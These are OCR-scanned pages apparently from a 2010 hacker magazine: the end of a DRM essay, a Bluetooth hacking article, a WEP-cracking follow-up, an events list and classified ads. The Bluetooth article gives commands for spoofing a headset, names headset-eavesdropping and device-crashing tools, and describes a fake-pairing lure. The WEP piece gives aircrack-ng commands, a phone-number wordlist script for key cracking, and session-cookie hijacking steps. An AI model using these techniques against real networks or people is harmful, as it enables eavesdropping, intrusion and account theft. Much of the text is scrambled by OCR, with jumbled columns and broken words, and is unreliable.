o u l d want to enable you moving to a different device. and journal articles disappear w h e n someone disagrees with the content. Sure. Let's face it. but only if it is not encrypted and if the new devices allow custom c o d e to run on them. Remote and invisible censorship.D R M books can be moved between devices and vendors (though again. Some of these problems can be overcome. Again.com . or if the content gets changed. electronic content is mutable. W h e n the ability to access content requires the cooperation of a controlling agency. Changing books to mutable. only if the device allows unprotected content to be v i e w e d in the first place). but a potentially dangerous precedent has already been set. It's definitely a much bigger deal if newspaper. including Microsoft and Walmart. N o n . open formats allows content to be moved to new devices.

by MS3FGX (MS3FGX@gmail.com)
Originally c o n c e i v e d in 1994 by Ericsson, Bluetooth w a s set to revolutionize the computing and consumer electronics world. It promised to rid us of wires a n d provide a method by w h i c h all of our devices c o u l d communicate seamlessly. Unfortunately, early versions of the protocol w e r e so beleaguered by problems that consumers w e r e all too happy to keep their spider w e b of cables. Besides, most technologies of the mid-nineties w e r e not exactly designed with mobility in mind in the first place. But today, Bluetooth has c o m e back in a big way. M o b i l e technology has dominated this decade, a n d the need for a standardized method of low-power c o m m u n i c a t i o n has never been greater. At the same time, newer versions of the Bluetooth protocol have all but eliminated the poor range, transfer rate, and interoperability issues that plagued earlier implementations. Bluetooth has n o w b e c o m e so popular in the mass market that it has e v e n attained a sort of brand association, to the point that most people simply refer to wireless headsets as "Bluetooths." H o w e v e r , w i t h the resurgence of Bluetooth has c o m e a dangerous, if predictable, complacency. M i l l i o n s of people are n o w using the technology without any clear understanding of h o w it works a n d w h a t it is c a p a b l e of. This article is not written as a hyper-technical look at the Bluetooth protocol, nor does it detail any o n e particular attack against Bluetooth devices. Instead, it is intended to give the reader s o m e information on h o w Bluetooth works, w h a t y o u c a n do with it, and the risks associated. Hopefully this article w i l l give you enough information to start exploring Bluetooth a n d a l l o w y o u to form your o w n opinions o n the technology.

pattern derived by the master device's clock.


tooth devices are able to avoid interference with other devices in the 2.4 G H z band, such as W i F i and remain segmented from other Bluetooth networks and cordless telephones,

By rapidly changing channels like this, Blue-

networks in the area. W h e n o n e Bluetooth d e v i c e wants to connect to another, it must go through a few steps to learn about and authenticate with the remote device. The eventual master device first scans the band to find other devices w h i c h are in so-called "discoverable" mode, and then performs an inquiry on each one. This gives the d e v i c e a list of hardware addresses (which are in the familiar MAC-48 format), humanfriendly d e v i c e names (which the o w n e r of the d e v i c e assigns, or more often than not, leaves as the default), d e v i c e class IDs (to determine w h a t the d e v i c e actually is), and clock offsets (used in calculating channel hopping operations). This provides the master device with enough information to begin establishing an actual connection with o n e or more of the devices it finds. The master sends out what is k n o w n as a frequency-hop synchronization ( F H S ) packet, w h i c h the slaves use to get locked on to the correct channels and start the authentication process. W h i l e the Bluetooth protocol is a master/ slave arrangement, there is a provision w h i c h allows for multiple devices to be connected together in w h a t is k n o w n as a piconet. In a piconet, up to eight Bluetooth devices can c o m m u n i c a t e simultaneously by timing their transmissions to fall on even or odd channel hops. The d e v i c e currently marked as master c a n c o m m u n i c a t e with any of the slaves in the piconet, as w e l l as add or remove devices from the network. It is also possible to connect multiple piconets together by having certain devices act as a master in o n e piconet and a slave in the other, w h i c h is referred to as a scatternet. active in the piconet, there can be up to 255 slaves waiting for their turn to be activated. In addition to the standard "active" "hold," and "park." Each mode, Even though only eight devices can be

between divided


Low-Level Communication
2.4 operates and 2.4835 in GHz, the


M H z w i d e . C o n n e c t e d Bluetooth devices hop channels at up to 1600 times per second in a

into 79 channels that are each


band 1


a slave in a piconet can be in three modes: "sniff," modes involves progressively less data transof these

Page 54

2600 Magazine


tion (important on portable devices). D e v i c e s nized with the piconet master, but do not back to "active" status. in these inactive modes still remain synchro-

mission and therefore lower p o w e r consump-

actively participate unless they are brought

Bluetooth hardware is rated in three Classes, w h i c h determine the output p o w e r (and therefore the approximate range) of the device:

Hardware Options

or another. The most fundamental of these is the Logical Link Control and Adaptation Protocol (L2CAP), w h i c h c o u l d be thought

Bluetooth services make use of in some w a y

There are a few core protocols that all

High-Level Protocols

Class 1 Class 2 Class 3

100 raw (20 dBm) -100 meters 2.5 mW (4 dBm) ~10 meters 1 mW (0 dBm) ~1 meter

of as the Bluetooth equivalent of TCP. L 2 C A P

sembling of packets, Q o S , a n d the channel identifiers (CIDs). C I D s are like T C P

handles the creation, sequencing, and reasports;

they are the endpoints between t w o devices through w h i c h processes can communicate. Like TCP, L 2 C A P also features a number of

If you don't mind spending a little money, try to get a Class 1 adapter that has an external antenna, such as the Linksys U S B B T 1 0 0 . Adapters w i t h external antennas are obviously going to have a better range out of the box, but are also easier to modify for use with a larger antenna. O n e of the nice things about w o r k i n g with Bluetooth hardware is that, since it uses the 2.4 G H z band, y o u c a n use W i F i antennas by simply hacking in the appropriate connector. O n the other side of the spectrum, y o u c a n get a low-end adapter for as little as $3 shipped from a number of overseas retailers. W h i l e the price is certainly right, y o u need to be careful w h e n buying these c h e a p adapters for use in research. Manufacturers w i l l often mislabel these devices as Class 1, w h e n they are actually Class 2 or e v e n sometimes Class 3. It is also c o m m o n for the very c h e a p adapters to have duplicate M A C addresses; rather than writing a n e w M A C address to e a c h device's firmware as it rolls off the line, it is cheaper for the manufacturer to leave them all w i t h the default. Don't be fooled by very c h e a p adapters with external antennas either. I have purchased many of these devices online, and every o n e of them had either a fake antenna (nothing more than a plastic stick), or just a bare w i r e poorly soldered to the existing internal antenna of a generic adapter. The last thing you w a n t to be a w a r e of w h e n buying Bluetooth hardware is the chipset it is using. W h i l e all of them are fairly good, the best supported and d o c u m e n t e d is the Cambridge Silicon Radio (CSR) chipset. There are a number of tools written specifically for this chipset, and with firmware modifications it is possible to get e n h a n c e d scanning a n d sniffing capabilities. W h i l e any adapter w i l l let you scan a n d enumerate, if you w a n t to get into more a d v a n c e d techniques like sniffing the pairing process a n d cracking PINs, a CSRbased d e v i c e is a must.

signalling commands that are used to control communication over the C I D s . Frequency The next Communication protocol is k n o w n as Radio At

ment for RS-232 connections; anything that

its core, R F C O M M is designed as a replace-


uses serial communications c a n be adapted to to 60 emulated serial ports per device, w h i c h are usually referred to as R F C O M M channels. channel, and remote devices address R F C O M M very easily. R F C O M M provides up

Bluetooth services bind to an open R F C O M M

and channel number.

particular service with a combination of M A C The last major protocol you should


aware of is the Service Discovery

tooth devices can determine w h i c h services the other is running and h o w they connect to them. Each S D P entry contains would

(SDP). S D P is the method by w h i c h t w o Blue-



the name of the service, w h i c h protocols it

can inform the user about the remote device's capability, and internally store the channel and protocol information for later use.

bound to. W i t h this information, the d e v i c e

relies on, and w h i c h R F C O M M channel it is

what are known as profiles or services. These applications are what the e n d user is actually interacting with w h e n they send a picture to a Bluetooth services available, certainly Networking more File

highest-level functions, w h i c h are provided by

O n top of all of these protocols are the

phone or connect a headset. There are many

than I w o u l d want to list here, but the main ones are Dial-up Transfer Profile (FTP), Headset Profile (HSP), and O b j e c t Push Profile ( O P P ) . (DUN),

It probably w o n ' t c o m e as much of a surprise to hear that the Linux Bluetooth stack, B l u e Z , is o n e of the most advanced and capable Bluetooth implementations available on any operating system. Unfortunately, not

BlueZ Basics

Sprine 2010

Page 55 ^

all parts of it are w e l l documented, and it is currently in a state of transition b e t w e e n the w i d e l y supported 3.x branch a n d the next generation 4.x branch. As of this writing, very little software supports the B l u e Z 4.x branch; B l u e Z 3.x is still the standard and is w h a t all of the software and guides are written for. This d o c u m e n t w i l l be no different, so the f o l l o w i n g information a n d recommended software is not guaranteed to w o r k under the newer B l u e Z 4.x releases. The easiest w a y to get started with B l u e Z is to run BackTrack 3 (BackTrack 4 has switched to B l u e Z 4.x, a n d dropped a lot of Bluetooth tools in the process), w h i c h includes a wealth of Bluetooth software a n d the proper libraries to make it all work. Even if you already have a Linux system up and running, it may be easier for y o u to run BackTrack as it w i l l already have all of the tools a n d support software ready to go, w h i c h may or may not be true for your distribution's package repository. The capabilities provided by B l u e Z c o u l d take up a f e w articles by itself, so I'm not going to detail every possible configuration a n d function of the w h o l e library, but let's take a brief look at the most important c o m m a n d s a n d h o w they work. The first tool, hciconfig, is the Bluetooth equivalent to ifconfig. W i t h this tool y o u c a n bring Bluetooth devices up and d o w n , set their operating modes, a n d various other lowlevel functions. The most useful function of hciconfig in the context of Bluetooth hacking is probably the ability to change the device's n a m e a n d class. For example, y o u c o u l d make your adapter appear to be a Bluetooth headset to the casual observer: bash* hciconfig hciO name "Motorola H700" class 0x200404 The second tool w e w i l l cover is hcitool. You w i l l be using hcitool quite a bit w h e n w o r k i n g with Bluetooth, as this c o m m a n d is w h a t y o u use to scan for, inquire, a n d ultimately pair w i t h other devices, hcitool also shows any current connections to a n d from a specific Bluetooth interface, as w e l l as details like signal quality a n d p o w e r levels. A scan for other Bluetooth devices looks like this: bash# hcitool scan Scanning ... 00:21:FB:5F:B3:21 LG VX9600 00:IB:AF:DB:CB:72 Nokia 6555b 00:15:A8:2D:4C:A2 Motorola Phone 00:1F:E3:77:E3:1F Dare H e r e y o u c a n see that my Bluetooth adapter is currently c o n n e c t e d to a remote d e v i c e (in this case, my mouse): bash* hcitool con Connections: > ACL B0:73:08:09:10:57 handle 42 V , •Page 5 6 -

state 1 lm MASTER O n c e connected to a device, hcitool can perform a number of other neat tricks, such as displaying the received signal strength indication (RSSI) for a given M A C , w h i c h can be used as a crude form of proximity detection. H e r e you c a n see h o w the RSSI differs between my mouse sitting right next to the keyboard a n d my phone charging across the room: bash# hcitool rssi B0:73:08:09:10:57 RSSI return value: 0 bash* hcitool rssi 00:IF:E3:77:E3:IF RSSI return value: -3 Unfortunately, due to the different output ratings of various devices you can't directly equate RSSI to a set distance. W i t h targets of u n k n o w n transmission power, the best you c a n do is determine if your distance from the target is increasing or decreasing. Another exceptionally useful tool is sdptool. This tool allows you not only to query the S D P records of remote devices, but also add, delete, a n d edit the S D P records being advertised for your adapter. Getting the S D P records for a target d e v i c e looks like this (truncated greatly for space): bash* sdptool browse 00:1F:E3:77:E3:IF Browsing 00:1F:E3:77:E3:IF ... Service RecHandle: 0x10000 Service Class ID List: "PnP Information" (0x1200) Service Name: Object Push Service RecHandle: 0x10001 Service Class ID List: "OBEX Object Push" (0x1105) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 1 "OBEX" (0x0008) Profile Descriptor List: "OBEX Object Push" (0x1105) Version: 0x0100 H e r e you c a n see the wealth of information returned by an S D P query. W e see not only the name and class of each service being offered, but also the protocols and services they rely on, the channels they use, and w h i c h version of the service is being run.

N o t only is sdptool invaluable for enumerating possible targets, it c a n also be used to advertise bogus services to remote devices. To go back to the hciconfig example, after changing your adapter's name and device class to that of a Bluetooth headset, you could then use sdptool to advertise the headset and handsfree profiles, in practice making your m a c h i n e almost completely indistinguishable from a standard headset. Finally, a f e w words about rfcomm, which is (rather obviously) the tool used to set up and




For example. and then attempted to pair with the target phone.0. but more likely y o u c o u l d just use the ignorance of the user to gain access.0000. As the n a m e suggests. pull out your p h o n e a n d have it search for nearby devices. but it should give you some ideas as to w h a t is possible. btscanner doesn't d o anything y o u couldn't already d o w i t h hcitool (in fact. but the simple fact that it compresses the output from multiple c o m m a n d s into a c l e a n Kismetinspired ncurses U l is enough to w i n over most users. From there you c o u l d try to find a device-specific exploit.bash# rfcomm bind rfcommO 00:0B:0D:6F:88:3E bash# cat /dev/rfcommO $GPGGA. respectively. The following are a f e w tools that a n y o n e interested in Bluetooth hacking should take a look at. You w i l l almost certainly pull up a f e w devices that have been left in discoverable mode. Allow? W h i c h . The end result? Your victim is n o w unwittingly wearing a bug strapped to the side of his head. I found that B S S could can L2CAP do Connection from DEVICE_NAME. These scanners a l l o w you to see w h i c h ports are open o n the target device. w h i c h are port scanners for R F C O M M a n d L2CAP. Coupled with a high-gain directional antenna. most of them still running the default d e v i c e name. In my research. which Bluetooth Stack Smasher (BSS) anything from completely crashing the target to simply impairing its ability to communicate. this w o u l d be it. Technically. this is a staggering security issue. an attacker could use this software to listen in on a meeting taking place in the office across the street.0000.558.M. if the phone the headset is paired with is not in range or otherwise unavailable.190505. To make things a little easier. w h e n c o m b i n e d w i t h your n e w d e v i c e name. binding a Bluetooth G P S to /dev/rfcommO over S P P w o u l d look something like: within five seconds of launching a random of fuzzed packets.0. Carwhisperer This is a simple tool that lets y o u bind a n interactive shell to an R F C O M M channel o n the remote device.. If you show this to your friends and they are not at least partially concerned. Carwhisperer scans for any headsets that are in discoverable mode. Carwhisperer is an absolutely brilliant piece of software that exploits a design flaw in many Bluetooth headsets: essentially. get n e w friends. This tool is used w h e n you want to create a direct link to an R F C O M M channel o n the remote device. Most phones w i l l prompt the user about n e w Bluetooth connections with a line like Real World Implications packets BSS is a tool to send malformed to a given MAC. enter 1234 to". rfcomm_shell A s a n experiment. a n d most headsets I tested it against w o u l d either disconnect from the host phone or simply restart themselves.0000*43 Recommended Software maintain R F C O M M links under BlueZ. This c a n be used to pass arbitrary data to a listening service. This list is by no means exhaustive. I made sure that all of these tools c a n b e found on the aforementioned BackTrack 3 Linux live C D . or you might need to legitimately connect to a d e v i c e over the Serial Port Protocol (SPP). You might use this to try and pass different commands to a Bluetooth service to see how it reacts. and then makes the headset believe the " p h o n e " has received a call.00. w h i c h c o u l d be used for things like passing AT c o m m a n d s to a phone or causing a buffer overflow. connects to them by using the included list of c o m m o n headset PINs.E. this isn't exactly ^ Spring 2010 Page 57-S the King's .0.0000. w o u l d look something like the screenshot on the next page.M.. next time you are out in a public p l a c e like a mall or a restaurant. This suite of tools contains rfcomm_scan and psm_scan. or just record all the audio from all the headsets picked up in a coffee shop or other public place to be analyzed for personal information at their leisure. btscanner BT Audit If you are looking for a quick w a y to scare your friends. Considering the number of people w h o walk around with a Bluetooth headset in their ear all day. this is a tool to continuously scan for nearby devices and extract as m u c h information as possible from them.0. Imagine if you changed the device n a m e of your Bluetooth adapter to "Facebook friend.N. it's heavily based on hcitool). Admittedly. the headset goes back into discoverable mode. w h i c h c a n help in finding services that are not advertised via S D P records.00000 . w h i c h causes the possible confusion remotely reboot a number of older phones attack on them ( B S S cycles through its list in the least amount of most time).0.

and hopefully reading this has gotten a few people a bit closer to that realization. For example. G i v e n Facebook's exploding application library and the questionable mental capacity of many social networking denizens. All you have to do is get out of the pervasive mindset that Bluetooth is solely capable of connecting a wireless headset to a mobile phone.English. the incentive is certainly therefor attackers to look into new ways to exploit the Bluetooth protocol. w h i c h is a technology that sends unsolicited advertisements to any Bluetooth device that comes into radio range. and indeed could both be happening at the exact same time. but this excellent feature doesn't seem to be making its way into many other devices. A c c»pt? W i t h so many Bluetooth devices in consumers' hands. low cost. to the point that people are n o w buying shielded wallets to prevent an attacker from sniffing any R F I D chips that may be present in their ID cards. Newer smartphones like the Blackberry allow the user to specify w h i c h Bluetooth services they wish to advertise. there is a budding industry (especially overseas) for Bluetooth proximity marketing. if used properly. Special thanks to all those w h o have donated their old Bluetooth-capable phones and other hardware to m e for research. and widely available wireless communication technology are nearly endless with a little imagination and a bit of hacking. and as w e all know. m III (HDD Pi sirlrcs r< q u M t from Faci•book 1 i Fritnd »Eint»r 1 2 3 4 to. poor grammar alone is unlikely to set off any mental alarms in the a ringtone you didn't ask for and logging your device's unique M A C along with the current time and geographical location of the transmitter is very slight. but in the modern "click first and ask questions later" world of shakily financed Nigerian princes. O n the other hand. Another possible threat that doesn't get nearly the attention it deserves is tracking and identification. Bluetooth is an incredibly useful technology for hackers and consumers alike. For example.0 protocol are slated for production soon. a lot still offer the option to leave the device permanently discoverable instead of using a time-limited discoverable mode. It is also worth mentioning that devices running the new Bluetooth 3. In fact. The technical difference between pushing out ^ Page 58 2600 Magazine ' . he will remain discoverable if he forgets to turn it back off (or just doesn't know any better). Vendor implementations of the current protocol are improving. and the increasing use of mobile devices for personal and financial data management. Another script downloads the latest Off the Hook M P 3 and pushes it into my phone's media player application. especially considering that the new specifications involve routing data over W i F i for increased range and speed. I have scripts on my machine that back up system configuration and personal documents to my phone every night. I have always found it rather ironic that a good deal of these people are likely carrying an active transmitter (which just happens to contain a wealth of personal information) in the pocket opposite their shielded wallet. imagine if you w e r e at a concert and advertised yourself as having free ringtones for the band currently on stage. I've been tinkering with a setup that sends my wife's phone an S M S alert if her laptop detects that the phone isn't within a certain proximity of her desk past a set time of day so she remembers to put it on charge. first run devices using new technologies are very likely to include a poor implementation at no extra charge. This means that if a user wants to put his device into discoverable mode to legitimately connect with his friend's device. Conclusion Ytl No average person's head. The possibilities for a low power. but are still not perfect. W h i l e many new devices default to non-discoverable mode. This particular attack can be even more effective if used contextually. a message like this could fool a decent amount of the targeted users. There is a huge fear of R F I D being used to track a person's location without their knowledge or consent.

e x p l o i t . The user base there is immense and if you have a problem or question. generate a copy of the cookie. Certain drivers inherently place the N I C in this mode. There isn't an easier way than this command line approach to aircrack? Clearly not everyone knows it well enough or it wouldn't still be so prevalent. and has already posted about it. This is all old information. given the prominence of online gaming and video (YouTube. everyone knows that W E P is weak M a n y sites use SSL and session cookies for authentication purposes.. BT>Radio Network Analysis>Privilege Escalation>Hamster In Firefox. Netflix streaming video. However. w h i c h prevents duplication in the short term and is a relatively short piece of data. O n e item of note here is that some wireless cards do not support injection (needed for the process of boosting the data flow). a process referred to as sidejacking. I strongly recommend browsing the backtrack forums (at both r e m o t e . the description of monitor mode was incomplete. o r g and b a c k t r a c k . but it's not working W E P uses the RC4 encryption cipher. as an FYI. The flaw here is that part of each data packet is the Initialization Vector (IV). there are two tools to make this process easier: Hamster/Ferret (from Errata Security) and W i f i Z o o .bat is gone. in a large enough data set. if cookie information is seen. even in corporate settings. which was released in midJanuary (now found at h t t p : / / w w w . By flooding the network. Your statement about monitor mode was vague/wrong ciphers. and that was the process I was outlining. it's very likely someone else does too. In BT4. etc). The plaintext data is combined with the encryption key data. there are some products that facilitate the cracking process. you will be taken into the account that generated that cookie. If this is the case. cookie theft. with many drivers that are injection capable. b a c k • track-linux. o r g ) and doing heavy searching of the forums and Google before posting questions there that have likely been asked before. IVs will begin to repeat and. Also. O n c e you launch a browser with this cookie. W h i l e this is conceptually sound. BackTrack is different now/ Installation problems I explained how to use aircrack-ng stepby-step because it more fully illustrates the elements and should help people understand the process in general. Some of the changes implemented impact how to install (for instance bootinst. a core limitation is that the encrypting portion of the data must not repeat. you may have the proper driver in place and still see the N I C in managed mode until "airmonng start" changes the mode. which is a stream cipher (encrypting continuously generated data rather than a pre-defined block of data). with enough repeating data. Since the article was originally written.. The more people that know how to get past it (and demonstrate this to those who make implementation decisions). if a network has a sufficiently active user (or many casually active users) enough data will be generated to allow cracking the key. it can be problematic to get the password. or be the "recommended" setting on certain routers. look into wesside-ng and Gerix W i f i Cracker (a G U I that implements the various steps). and is now a much more straightforward process). However. check your proxy settings to I'm trying to use some of the tools you mentioned to get a Gmail password. but you can easily capture the cookie or session key after the user authenticates and then make the site believe your browser is the authenticated user. This "large enough" is the key to the process outlined in the how-to.Hn Anticipatory Response [or "Simple How-to on Wireless and Windows Cracking" Part 3] Part One appeared in our Summer 2009 issue by KES In retrospect. one can then determine the encryption key and decrypt everything. the dataset grows to a sufficient extent to enable cracking.org/). BT3 has moved through BT4-beta and BT4-prefinal to BT4 Final. Both of these sniff packets and. or session hijacking. You can manually change the mode with iwconfig as well. Hamster/Ferret works in W i n d o w s .l i n u x . the faster it will be phased out. 1. However. and is a process used effectively in other You told people how to defeat it but didn't teach them why W E P is so weak Spring 2010 Page 59 ^ . Therefore. 2. even without injection.

The example below is seeded with information for Danbury. 5. that's a mere 0.org forum in the suggestions area.0. and if the 3 0 % success rate holds. Both are effective in winning budget dollars. in the aircrack-ng. the following shell script will generate a wordlist of all the phone numbers in a given area. if one plans on frequently using a particular machine with a U S B O S . I have also posted this script. you should adjust the boot order in the B I O S . p <= 9. you can run aircrack-ng -w h:<wordlist> < c a p t u r e file> Even for N Y C . You could also use Wireshark and filter for instant messages. is a meaningful tool. if you work in IT and are arguing an upgrade) this is a very powerful element to include in the demonstration.area-codes.0. different Linux distribution? 3. The user just has to populate the first array with "area code+exchange(s)" in the AA:AE:EE: format (a good source for this data is www. Since aircrack can use wordlists.W a i t for appropriate data to be collected G O T O target If you are cracking a W E P network to illustrate its weakness (for instance. make the machine a dual-boot). W h a t if I a l r e a d y h a v e a You can add aircrack-ng suite and others tools via your distribution's respective package manager. I'd recommend running airodump-ng -t WEP -w < c a p t u r e file> < i n t e r f a c e > and then after you have a tiny bit of data (just 4 IVs). k++ ) ) do for (( e = 0 e <= 9. G o to http://hamster/ Choose adapter. so that the machine checks for U S B drives before the H D D (or better yet. However. A N D does not require injection. with twenty million options. k <= 9. CT. p++ )) do for (( k = 0 . 6. submit make sure 127. W h y n o t just e d i t t h e b o o t o r d e r ? M y article included interrupting the booting process because I wanted to show as much flexibility as possible.001 % of the potential W E P passw o r d set. To use the wordlist. " 2 0 32:4 1:' 20:32:97: 20:32: 89: '20:33 : 76 "20 : 34:24 "20 :34:48: '20:35 : 33 "20 : 35:46 "20 : 36:16 '20:37 : 30 "20 :37:31 "20 : 37:39 '20:37 : 46 "20 :37:48 "20 : 37:49 '20:37 : 88 "20 :37:90 "20 :37:91 '20:37 : 97 "20 :37:98 "20 : 38:25 "20 :39:17 "20 : 39:35 '20:38 : 85 ' A n y t h i n g else? It! /bin/sh «i=( "20:32:05:' "20:32:07:' »"20:33:00: 20:33:12: »"20:34:60 20:34:82 • "20:36:17 20:36:48 »"20:37:40 20:37:43 »"20:37:70 20:37:75 »"20:37:92 20:37:94 »"20:38:26 20:38:30 »"20:39:42 20:39:47 ?=0 "20:32:40: 20:33:13 20:35:12 20:37:02 20:37:44 20:37:78 20:37:96 20:38:37 20:39:94 <0 = 3=0 /—0 for w in "${w[@]}" do for ( ( p = 0 .1:1234 is in place In a multi-city study. com). 4. I have found that approximately 1 out of 3 W E P networks are secured with the phone number of the location. y++ do key="$w$p$k":"$e$y echo $key done done done done done )) ^ Page 60 2600 Magazine ' . as well as a much larger one for NYC (with nearly 2000 area code/exchange combos covering 11 area codes). e++ )) do for (( y = 0 y <= 9.

are open to everyone. Hacker conferences generally cost under $100 and are open to everyone.notacon.org April 17-18 Hacks4 Democracy Kalkscheune. France www. Johannisstrasse 2 Berlin. Middle Island.org July 16-18 The Next H O P E Hotel Pennsylvania New York.lu/camp/2010/wiki/HaxoGreen July 29 .hackday.ccc.net July 22-25 HaxoGreen Camp Rue Jean Friedrich Dudelange.org V Spring 2010- -Page 61^ . email us at happenings@2600. Austria plumbercon.org April 30 . Luxembourg events. Rl www.org May 22-24 SIGINT 2010 Komed Im Mediapark Cologne. NY www. O H www. aren't ridiculously expensive. PO Box 99. April 15-18 Notacon 7 Wyndham Cleveland at Playhouse Square Cleveland.hackerspace.defcon.com or by snail mail at Hacker Happenings. NY 11953 USA.August 1 Defcon 18 Riviera Hotel and Casino Las Vegas.de/sigint/2010 July 9-11 PlumberCon 10 The WerkzeugH.net April 23-25 QuahogCon Hotel Providence Providence. Germany opendata.hope. If you know of a conference or event that should be known to the hacker community.contorsions-technologiques.H A P P E N IN O S j Listed here are some upcoming events of interest to hackers. Germany events. Higher prices may apply to the more elaborate events such as outdoor camps. 27 rue de la Glaciere Paris. NV www.May 2 Les ContorsionsTechnologiques La Suite Logique.quahogcon. and welcome the hacker community. We only list events that have a firm date and location. Schonbrunnerstrasse 61 Vienna.

TV-B-GONE. Turn off TVs in public places! Airports.com Help Wanted ATTN 2600 ELITE! In early stages of project to develop an international social network for information exchange. Sensei forensic technologists all hold prestigious forensics certifications.com B S O D O M I Z E R . espionage. and even O Magazine. Our experts are cool under fire in a courtroom and their forensic skills are impeccable. The kit turns off TVs at 40 yards! And for professionals. wire fraud. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler.com. Available at $45 per 12 pack of half liter bottles.2600. Olivettet Sur. C D 9621 Olive.TVBGone. Email: cabledescramblerguy®yahoo. Our principals are co-authors of The Electronic Evidence Handbook (ABA 2006) and of hundreds of articles on computer forensics and electronic evidence. as well as the super-popular original keychain. the TV-B-Gone Pro turns off TVs up to 100 yards away! 2600 readers get the keychains for 1 0 % discount by using coupon code: 2600REAL. Tired of being naked! JINX. child pornography possession/distribution. Write to contact@club-mate.JINX. No need for a shim or bolt cutters. Lansing. New. Looking to get a job in this area once I leave school so any help would be much appreciated.com THE T O O R C O N F O U N D A T I O N is an organization founded by ToorCon volunteers to help schools in undeveloped countries get computer hardware and to help fund development of open source projects. now you can K N O W the combination! C L U B MATE now available in the United States. Also available as an open source kit. Uber-Secret-Special-Mega Promo: Use "2600v27no1" and get 1 0 % off of your order. and much more.. India. http://www. Want to make money working from home or on the road. battery-powered. Box 28992-TS.com. This will cause the user to become confused and turn off or reset his or her machine. LockGenie helps crack combination locks.net Events COMBINATION LOCK CRACKING IPHONE A P P "LockGenie" Now available in the App Store (http://itunes. then the output goes to TV set tuned to channel 3. So take a five minute break from surfing prOn and check out http://www. 17. Radio Shack) to be used with the unit. interception of electronic communications. from the budding nOOblet to the vintage geek. terrorism. Are you looking to apply your technical skill set to a multitude of world changing projects. murder. Wanted C O M P U T E R FORENSICS FOR THE DEFENSE! Sensei Enterprises believes in the constitutional right to a zealous defense. They lecture throughout North America and have been interviewed by ABC. www. sweatshirts. Don't be fooled by inferior fakes. and backs up that belief by providing the highest quality computer forensics and electronic evidence support for criminal defense attorneys. embezzlement.hope. W e have already accomplished our first goal of building a computer lab at Alpha Public School in New Delhi.schematics. A small. quantum causality.com has 300+ T's.C. 18. Missouri 63132. Bulk discounts for hacker spaces are quite significant. identity theft. More information can be found at http://foundation. New York City. Works on analog or analog/ digital cable systems. Turning off TVs is fun! See why hackers and jammers all over the planet love TV-B-Gone. cyber abuse.com. call (740) 544-6563 extension 10. L O O K I N G FOR PEOPLE TO HELP TEACH ME the basics of network forensics and security. Each $35 + $5 shipping.F. Hotel Pennsylvania. Reuters.com/2600art2 JSNX-HACKER C L O T H I N G / G E A R . Contact administratorerogueentity. Requires a cable TV converter (i. CABLE TV DESCRAMBLERS. cyber harassment. theft of proprietary data. algorithmic structures. and technical design documentation online if you want to build your own instead of buying one. Only the genuine TV-B-Gone remote controls can turn off almost any TV in the world! Only the genuine TV-B-Gone remote control has Stealth Mode and Instant Reactivation Feature! Only the genuine TV-B-Gone remote control has the power to get TVs at long range! Only the genuine TVB-Gone remote control is made by people who are treated well and paid well. ART F O R THE HACKER W O R L D ! Show your guests your inner g33k! Don't commercialize your living area with mass produced garbage! These are two original pieces of artwork inspired by technology that the 2600 reader fellowship will love! Check out the easy-to-remember links below and order today! http://tinyurl. NBC. KS 66043.org. W e ' v e got swag for everyone.com.us or order directly from store.. 2010. For more information. sovereignty. stickers. solicitation of minors. racketeering. then the descrambler. L. Fully open source . L O O K I N G FOR 2600 READERS who would like to offer their services for hire. money order/cash only. rape. anywhere there's a TV.Marketplace THE NEXT H O P E . Limited run of 100 fully-assembled units available. P O Box 2. many newspapers. and are looking for additional donations of old W O R K I N G hardware and equipment to be refurbished for use in schools around the world. Premium channels and possibly PPV depending on system. network traffic analysis. social engineering. If it doesn't say Cornfield Electronics on it. bars. Just a few topics include: cryptography/secure communications. W e handle a wide range of cases.bsodomizer. The caffeinated German beverage is a huge hit at any hacker gathering. C N N . including hacking. and hats for those rare times that you need to leave your house. restaurants. For details write: Joseph Hayden #74101.com/apps/lockgenie). or need to barter information with professionals to expand your reference base? We need your help to see this project succeed. business and tax law manipulations. mischievous electronic gadget that interfaces between a laptop or desktop and V G A monitor and flashes a fake B S O D (Blue Screen of Death) onto the monitor at random time For Sale intervals or when triggered by an infrared remote control. Cable connects to the converter. call us at 703-359-0700 or e-mail us at sensei©senseient. Go to www.com/2600art1 http://tinyurl. it is not the real deal. firmware. July 16. Complete with 110vac power supply.e. CBS. Services ^ Page 62 2600 Magazine ' .toorcon. and more.

or email info@banditdefense. Multiple FreeBSD servers.R9 MEDIA is looking for artists and writers for ThinkingFluidiy. other formats benefit EFF. has launched a FREE classified ad. blogspot. phreaks. Of course. W e hope that's clear.com.net.net/ SECURITY ASSESSMENT A N D EXPLOITS.re-configure. anonymous payment methods. Download at http://www. hacking your organization from your office (physical security.com/earthintelnet. housing. Don't expect us to run more than one ad for you in a single issue either. Personals L O O K I N G FOR HACKERS A N D PHREAKERS! If interested email me at Albany2600figmail.com ONLY S U B S C R I B E R S C A N ADVERTISE I N 2600! Don't even think about trying to take out an ad unless you subscribe! All ads are free and there is no amount of money w e will accept for a non-subscriber ad.g2meyer. services.). I specialize in working with small businesses and organizations. Middle Island.com (215) 806-4383 BANDIT DEFENSE: SECURITY FOR THE LITTLE G U Y . and other misc. A new 20th anniversary edition of the first sociological study of pirates.com. I'm both a lawyer and an IT professional.com. the founder of www. All about Oracle database programming. Discover what it was like before the Internet and Operation Sun Devil. and viruses.reverse. KALETON INTERNET provides secure and private web hosting. Oracle 11g. org. local network audits.com/cu/ BLACK O F HAT B L O G .com now to see how w e can help you. President for the non-profit Earth Intelligence Network. More details at www. Visit ora-pl-sql. Recent topics include stored procedures. j . Reconfigure. W e have offshore servers. Full disclosure via professional detailed technical report. file parsing. Contact earthintelnetfigmail. Independent hacker available for LEGAL contracts. Deadline for Summer issue: 5/25/10.org. intelligent hackers require the need for a secure place to work. electronic security culture (evading surveillance. HELP ME O U T ! SPREAD THE W O R D ! Please visit www. Inquiries to canada2600@gmail. social activities. Visit us at www. sorting.OSS. W e would be interested in publishing your work.com. You can also tune in over the net at www. want ad. You can also email your ads to subs®2600. Send check or money order to 2600. code viewers.com. compile.org JEAH. It is time to learn Java. servers. INTELLIGENT HACKERS U N I X SHELL. domain name registrations. Our online Public Intelligence Journal can be found at http://phibetaiota. W e make no guarantee as to the honesty. All submissions are for O N E ISSUE ONLY! If you want to run your ad more than once you must resubmit it each time. In today's hostile anti-hacker atmosphere. Affordable pricing from $5/month. security. Coupon Code: Save2600. re-configure. N Y 11953 U S A 